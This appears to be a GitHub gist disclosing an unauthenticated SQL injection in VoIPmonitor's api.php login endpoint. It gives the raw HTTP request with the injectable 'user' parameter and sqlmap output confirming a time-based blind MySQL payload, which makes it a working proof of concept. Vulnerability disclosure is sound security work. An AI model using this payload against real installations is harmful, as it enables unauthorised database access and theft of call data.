Skip to content

Instantly share code, notes, and snippets.

@divinepwner
Created April 28, 2021 19:33
Show Gist options
  • Save divinepwner/e51050e0d7df77ff1f1379583e8cf7db to your computer and use it in GitHub Desktop.
Save divinepwner/e51050e0d7df77ff1f1379583e8cf7db to your computer and use it in GitHub Desktop.
voipmonitor unauth sql injection

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close

sqlmap result:

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'

cc: @cnbrkbolat & @R0h1rr1m

@divinepwner
Copy link
Author

website of the product:

https://www.voipmonitor.org/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment